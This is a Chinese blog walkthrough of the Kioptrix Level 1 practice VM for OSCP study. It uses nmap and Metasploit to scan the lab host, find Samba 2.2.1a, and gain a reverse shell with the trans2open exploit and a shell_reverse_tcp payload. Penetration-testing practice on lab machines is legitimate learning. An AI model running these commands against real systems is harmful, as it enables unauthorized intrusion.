OSCP靶场练习1 —— Kioptrix_Level_1

最新推荐文章于 2024-07-24 10:35:36 发布
最新推荐文章于 2024-07-24 10:35:36 发布
阅读量514 收藏 11
点赞数 8
文章标签: 安全 系统安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_53801131/article/details/134960545
版权

地址:Kioptrix_Level_1

1. 注意事项

靶机的配置文件.vmx里的ethernet0开头的语句都要删掉,打开后自行新建网络适配器的NAT模式,不然无法使用NAT模式。

2. 发现存活主机

nmap -sn 192.168.198.1-254
扫描kali的C段地址,发现存活主机,-sn表示对目标进行ping检测,不进行端口扫描。

$ nmap -sn 192.168.198.1-254
Starting Nmap 7.93 ( https://nmap.org ) at 2023-12-12 22:35 CST
Nmap scan report for 192.168.198.1
Host is up (0.0043s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 192.168.198.2
Host is up (0.00026s latency).
MAC Address: 00:50:56:F8:C8:21 (VMware)
Nmap scan report for 192.168.198.137
Host is up (0.00046s latency).
MAC Address: 00:50:56:29:17:A3 (VMware)

靶机IP地址为192.168.198.137

3. 扫描端口

nmap -sS -v 192.168.198.137
使用SYN扫描端口,显示扫描过程的详细信息。

PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
111/tcp  open  rpcbind
139/tcp  open  netbios-ssn
443/tcp  open  https
1024/tcp open  kdm

发现开启了TCP 139高危端口,跟进看看该端口具体开启了什么服务,服务是什么版本。

4. 版本探测

nmap -sS -sV 192.168.198.137
使用SYN扫描,显示端口版本的详细信息。(sV可以用service version来记忆)

PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 2.9p2 (protocol 1.99)
80/tcp   open  http        Apache httpd 1.3.20 ((Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
111/tcp  open  rpcbind     2 (RPC #100000)
139/tcp  open  netbios-ssn Samba smbd (workgroup: MYGROUP)
443/tcp  open  ssl/https   Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
1024/tcp open  status      1 (RPC #100024)

TCP 139端口对应的是samba服务,但还是看不到具体的版本,这时候用msf来看版本信息。

5. 再次进行版本探测

msfconsole #开启msf控制台
use auxiliary/scanner/smb/smb_version #加载模块
set rhosts 192.168.198.137 #设置参数
run #运行

[*] 192.168.198.137:139   - SMB Detected (versions:) (preferred dialect:) (signatures:optional)
[*] 192.168.198.137:139   -   Host could not be identified: Unix (Samba 2.2.1a)
[*] 192.168.198.137:      - Scanned 1 of 1 hosts (100% complete)

发现是Samba 2.2.1a版本

6. 搜索漏洞

searchsploit Samba 2.2.1a
在msf使用searchsploit进行sploit模块的搜索。

------------------------------------------------------------- ---------------------------------
 Exploit Title                                               |  Path
------------------------------------------------------------- ---------------------------------
Samba 2.2.0 < 2.2.8 (OSX) - trans2open Overflow (Metasploit) | osx/remote/9924.rb
Samba < 2.2.8 (Linux/BSD) - Remote Code Execution            | multiple/remote/10.c
Samba < 3.0.20 - Remote Heap Overflow                        | linux/remote/7701.txt
Samba < 3.6.2 (x86) - Denial of Service (PoC)                | linux_x86/dos/36741.py
------------------------------------------------------------- ---------------------------------

使用第一个trans2open进行漏洞利用。
search trans2open #搜索该漏洞利用

Matching Modules
================

   #  Name                              Disclosure Date  Rank   Check  Description
   -  ----                              ---------------  ----   -----  -----------
   0  exploit/freebsd/samba/trans2open  2003-04-07       great  No     Samba trans2open Overflow (*BSD x86)

7. 漏洞利用

use exploit/freebsd/samba/trans2open
options
set RHOSTS 192.168.198.137
set payload linux/x86/shell_reverse_tcp
run
成功拿到权限!

关于trans2open漏洞,这是博主在网上搜到的相关原理的文章,但看不太懂,贴上:https://blog.csdn.net/qq_43443410/article/details/119255028

Merrill He
关注
  • 8
    点赞
  • 11
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
KIOPTRIX: LEVEL 1 (#1)
logan_logan的博客
12-19 501
KIOPTRIX: LEVEL 1 (#1) 1.浏览器输入地址打开,是一个Test page网页,接下来开始进行信息收集; 2.信息收集 2.1 使用namp工具对端口进行扫描 发现apache的版本较老,同时开了samba服务,接下来考虑对这两个信息进行更深入的验证。 2.2 使用gobuster枚举目录 对扫描的目录进行验证之后发现没有多少有用信息; 3.漏洞探测 3.1 apache漏洞探测 在kali里面搜索漏洞,接下来开始进行尝试 3.2 samba漏洞探测 使用msf探测到samba版
1-OSCP自学笔记-October靶机练习1
08-04
OSCP自学笔记-October靶机练习1】这篇教程主要介绍了如何通过渗透测试技术攻破一个名为"October"的靶机。靶机来自于Vulnhub平台,作者选择了10台典型的靶机作为OSCP(Offensive Security Certified Professional)...
kioptrix-level-1
热门推荐
cxyzupup的博客
01-10 1万+
kioptrix-level-1-1,22 项目地址:https://www.vulnhub.com/entry/kioptrix-level-1-1,22 提示:靶机网络连接方式使用NAT模式。 文章目录kioptrix-level-1-1,22一、信息收集1. 使用fping工具查找靶机IP:2. 使用nmap对目标主机端口进行枚举:二、信息利用1. 查看80端口:2. 查看443端口:总结 一、信息收集 1. 使用fping工具查找靶机IP: 命令如下: kali@kali:~/Desktop$ fp
渗透日记————Kioptrix Level 1
m0_73700261的博客
04-09 405
扫描端口发现有以下端口开放其中比较重要的有三个端口开放80 22 和139端口。接着使用msf查看版本漏洞接着搜索看看有没有对应的漏洞。sumba端口是Linux系统上的一个免费软件。接着设置攻击靶机ip和对应的payload。cd进入根目录ls一下发现可以成功命令执行。发现靶机ip为:10.102.8.194。是用来为局域网内为不同计算机提供共享服务。发现该sambe服务器为2.2.1a。那么第一步先扫描发现靶机的地址。139端口是一个sumba端口。接着继续搜索历史漏洞。
oscp——Kioptrix: Level 1 (#1)
王嘟嘟的博客
01-31 1109
0x00 前言 这个是第十七台机子了,网上说这个机子是非常简单的,所以来试验一下 链接 https://www.vulnhub.com/entry/kioptrix-level-1-1,22/ 0x01 信息收集 1.IP 2.端口 0x02 攻击 1.端口 这里可以看到80端口开放了OpenSSL 使用nikto进行扫描(我记得oscp考试貌似不让使用工具) nikto -host 192....
oscp.rar_光谱 增强_光谱信息增强_光谱处理_正交信号校正_浓度
09-20
在光谱分析领域,"oscp.rar_光谱 增强_光谱信息增强_光谱处理_正交信号校正_浓度"这个压缩包文件聚焦于一系列关键概念和技术,其中最重要的是正交信号校正(Orthogonal Signal Correction, OSCP)以及光谱增强和信息...
OSCP_2.0_Specification.zip
02-05
OSCP_2.0_Specification.zip
OSCP NOTES ACTIVE DIRECTORY 1.pdf
10-06
在“OSCP NOTES ACTIVE DIRECTORY 1”这份文档中,重点聚焦于Windows Active Directory环境下的渗透测试过程,这在企业环境中尤其重要,因为Active Directory通常作为组织的核心身份验证和资源管理平台。 首先,...
微软蓝屏事件引发对构建更加稳固和安全的网络环境的思考
最新发布
lupai的博客
07-24 317
综上所述,构建更加稳固和安全的网络环境需要政府、企业和用户共同努力,从政策、技术、用户行为等多个方面入手,形成全方位、多层次的网络安全防护体系。构建更加稳固和安全的网络环境是一个系统工程,需要从多个方面入手,包括政策、技术、用户行为等多个层面。建立完善的应急响应机制,制定应急预案和演练计划,提高应对网络攻击和突发事件的能力。鼓励和支持网络安全技术的研发和创新,推动新技术在网络安全领域的应用和推广。加强对用户的网络安全教育,提高用户的网络安全意识和防范能力。
网络战时代的国家安全:策略、技术和国际合作
2301_79955948的博客
07-24 951
网络战时代的国家安全涉及到策略、技术和国际合作等多个方面。
ForCloud全栈安全体验,一站式云安全托管试用 开启全能高效攻防
亚信安全官方账号的博客
07-19 576
一站式云安全托管限时试用 开启全能高效攻防
防火墙--内容安全
banliyaoguai的博客
07-20 1206
内容安全是指对互联网上的内容进行监测、筛选和管理,以确保用户在浏览、使用互联网内容时的安全和合法性。各个厂商在进行内容安全的检测、分析和处理的过程被称为引擎。下面以华为IAE引擎来对内容安全进行学习ID:区分不同的签名对象:服务器,客户端。一般我们将发起连接的设备角色认定为客户端,响应连接并提供服务的角色认定为服务器。严重性:该行为一旦爆发之后,对我们网络系统的影响程度的评级协议/应用程序:这种攻击所承载的协议或者应用。
服务攻防-框架安全(漏洞复现)
m0_74402888的博客
07-21 561
Node.js库中的systeminformation软件包中存在一个命令注入漏洞(CVE-2021-21315。运行dockers容器。
防火墙之内容安全过滤技术篇
qq_67758645的博客
07-19 647
IMAP是一种在线协议,它不用将邮件下载到本地,可以在多台支持IMAP协议的设备上同时进行文件的操作,它会将用户的操作同步到服务器上,实现邮件的共享和同步。而IMAP协议支持双向通信,用户可以在不同的设备上对邮件进行标记、移动、删除等操作,这些操作会实时同步到服务器上,确保邮件状态的一致性。IMAP允许邮件保留在服务器上,用户可以在任何支持IMAP的设备上访问这些邮件,实现邮件的同步和共享。可以执行的动作 --- 告警,阻断,按权重操作 -- 我们可以给每个关键字设置权重值,之后根。(一定时间后会删除)
nginx的配置:TLSv1 TLSv1.1 被暴露不安全
keyboard专栏
07-22 285
要在 Nginx 配置中禁用不安全的 SSL 协议(如 TLSv1 和 TLSv1.1),并仅启用更安全的协议(如 TLSv1.2 和 TLSv1.3),您可以更新您的 Nginx 配置文件。这样,您的 Nginx 服务器将只允许更安全的 TLSv1.2 和 TLSv1.3 协议,并且禁用不安全的 TLSv1 和 TLSv1.1。
探究大语言模型(LLM)漏洞和安全优秀实践
java_cjkl的博客
07-21 1079
你可能已听说过LLM强势亮相,至少ChatGPT就是代表。大语言模型(LLM)指语言处理模型。这类模型经过训练,可以执行各种各样的语言任务:翻译、文本生成和问题回答等。有几个LLM家族和架构,最著名的是GPT(生成式预训练Transformer)。每种 LLM都有各自的特定功能,但本文侧重介绍LLM普遍固有的安全问题。随着越来越多的公司集成LLM以增强用户体验或简化和加速内部流程,这种类型的集成特有的新漏洞随之出现。
安全防御:双机热备
AXDRXS的博客
07-19 1420
因为防火墙上不仅需要同步配置信息,还需要同步状态信息(会话表等),所以,防火墙不能像路由器那样单纯的靠动态协议来实现切换,需要用到双机热备技术。也存在冷备的概念,仅工作一台设备,备份一台设备,备份设备仅同步配置,并不工作,只有在主设备出现故障时,再由管理员替换工作,冷备可能会造成较长时间的业务中断.
python CP1L
08-11
在 Python 中,如果您想与 CP1L 进行通信,可以使用欧姆龙公司提供的 Open Serial Communication Protocol(OSCP)来实现。您可以使用 Python 的串口通信库(例如 pySerial)与 CP1L 进行通信,并遵循 OSCP 的协议...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Merrill He

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值